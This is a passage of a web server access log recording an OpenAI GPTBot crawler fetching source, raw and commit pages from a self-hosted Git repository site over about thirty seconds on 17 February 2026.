(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15599] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15599] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" +[17/Feb/2026:16:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14258] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" +[17/Feb/2026:16:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16524] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14257] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" +[17/Feb/2026:16:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13951] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" +[17/Feb/2026:16:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14866] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" +[17/Feb/2026:16:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14868] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16525] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13978] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" +[17/Feb/2026:16:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" +[17/Feb/2026:16:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14255] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" +[17/Feb/2026:16:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15568] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" +[17/Feb/2026:16:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16522] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14837] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16492] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15598] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14867] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" +[17/Feb/2026:16:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9922] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15613] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" +[17/Feb/2026:16:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 7800] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" +[17/Feb/2026:16:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11419] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:16:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15785] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12804] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" +[17/Feb/2026:16:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11542] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" +[17/Feb/2026:16:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" +[17/Feb/2026:16:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" +[17/Feb/2026:16:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" +[17/Feb/2026:16:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9921] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11517] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" +[17/Feb/2026:16:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" +[17/Feb/2026:16:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:16:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10477] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:16:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:16:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11543] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" +[17/Feb/2026:16:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11982] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" +[17/Feb/2026:16:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11519] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" +[17/Feb/2026:16:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12805] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" +[17/Feb/2026:16:42:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" +[17/Feb/2026:16:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/services/geminiService.ts" +[17/Feb/2026:16:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 11340] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" +[17/Feb/2026:16:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15108] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9816] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" +[17/Feb/2026:16:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10888] [Gzip 